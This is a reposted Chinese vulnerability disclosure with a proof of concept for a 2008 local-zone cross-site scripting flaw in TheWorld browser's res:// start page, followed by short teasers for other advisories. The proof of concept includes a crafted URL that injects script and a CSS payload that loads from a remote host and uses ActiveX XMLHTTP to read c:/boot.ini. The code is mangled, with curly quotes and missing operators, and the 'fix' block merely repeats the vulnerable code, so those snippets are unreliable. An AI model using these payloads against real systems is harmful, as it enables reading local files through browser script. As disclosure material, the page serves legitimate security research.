世界之窗等浏览器本地xss跨域漏洞POC                
                
                    所属分类:
                        网络安全 / 漏洞分析                    
                    阅读数:
                        223
                    
                        收藏 0赞 0分享
                    
                 
                
                    
漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html
  文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt
  漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下:
<script language="JavaScript"> 
var nOldCount = 0; 
for( i = 0; i < g_nCountOld; i    ) 
{ 
str_url = g_arr_argUrlOld[i]; 
str_name = g_arr_argNameOld[i];  
str_td = “<tr ID=’twOldItem”   i  ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>”   “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”; 
document.write( str_td );  
str_td = “<td><a target=’_blank’ href=’”   str_url   “‘>”   str_name   “</a></td></tr>”; 
document.write( str_td ); 
nOldCount = i; 
g_bHasLastUrl = true; 
} 
</script> 
 
  str_name和str_url不经过滤地直接输出,由于该页面处于本地安全区域,所以拥有很高的权限,可以做很多跨域操作,包括读取文件和运行本地程序。
  漏洞修补:
<script language="JavaScript"> 
var nOldCount = 0; 
for( i = 0; i < g_nCountOld; i    ) 
{ 
str_url = g_arr_argUrlOld[i]; 
str_name = g_arr_argNameOld[i];  
str_td = “<tr ID=’twOldItem”   i  ”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’” i ”‘);\”>”   “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”; 
document.write( str_td );  
str_td = “<td><a target=’_blank’ href=’”   str_url   “‘>”   str_name   “</a></td></tr>”; 
document.write( str_td ); 
nOldCount = i; 
g_bHasLastUrl = true; 
} 
</script> 
 
  已经用js控制DOM显示了
  漏洞演示:这里提供测试方法可以读取c:/boot.ini
  1 打开如下地址
sc:h’><script>alert(document.write(unescape(””)))</script> 
  2 上面将导致一个不可访问的页面,然后直接关闭tw浏览器( 没有好的办法crash)
  3 重新打开tw浏览器,可以发现http://www.80sec.com/1.css中的内容被解析,并且有本地域的权限。
  1.css内容,换成其他js代码一样执行
body { 
background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);') 
} 
  漏洞状态:
  2008-06-24通知厂商
  2008-06-25修补
  http://www.ioage.com/cnnew/uplog.htm
                                    
             
            
                
                2007年12月网络安全漏洞总结
 声明:本十大安全漏洞由NSFOCUS安全小组根据安全漏洞的严重程度、影响范围等因素综合评出,仅供参考
  1.2007-12-11 Microsoft消息队列服务栈溢出漏洞
  综述:
  Microsoft Windows是微软发布的非常流行的操
                    
                    收藏 0赞 0分享
OmniPCX Enterprise存在远程命令注入漏洞
受影响系统:  
Alcatel-Lucent OmniPCX Enterprise <= 7.1  
不受影响系统:  
Alcatel-Lucent OmniPCX Enterprise 7.1 patch F5.401.19  
Alcatel-Luc
                    
                    收藏 0赞 0分享
Sun Java jpiexp32.dll对象名称含空指针引用漏洞
受影响系统: 
Sun JRE < 5.0 Update 14 
不受影响系统: 
Sun JRE 5.0 Update 14 
描述: 
Solaris系统的Java运行时环境(JRE)为JAVA应用程序提供可靠的运行环境。  
JRE处理畸
                    
                    收藏 0赞 0分享
InterBase和Firebird远程栈缓冲区溢出漏洞
受影响系统: 
Borland InterBase WI-V8.1.0.257 
Borland InterBase WI-V8.0.0.123 
Borland InterBase WI-V7.5.1.80 
Borland InterB
                    
                    收藏 0赞 0分享
IE 存在document.open()方式地址欺骗漏洞
受影响系统: 
Microsoft Internet Explorer 7.0 
Microsoft Internet Explorer 6.0 SP1 
Microsoft Internet Explorer 6.0 
Microsoft
                    
                    收藏 0赞 0分享
Microsoft IE onunload事件地址栏欺骗漏洞
受影响系统: 
Microsoft Internet Explorer 7.0 
Microsoft Internet Explorer 6.0 SP1 
Microsoft Internet Explorer 6.0 
Microsoft Internet Ex
                    
                    收藏 0赞 0分享
F2blog XMLRPC 上传任意文件漏洞
刚从官方下载的最新版:F2blog-v1.2_build_03.01_full
存在漏洞文件:xmlrpc.php,
影响:可上传任意文件到服务器。
原理:get_http_raw_post_data()是获取最原始的传递过来的数据,也是说不会因为PHP环境的ma
                    
                    收藏 0赞 0分享
FTP客户端目录遍历漏洞可向任意位置写文件
FFFTP是一款小型的FTP客户端软件。FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。  
    受影
                    
                    收藏 0赞 0分享
                 查看更多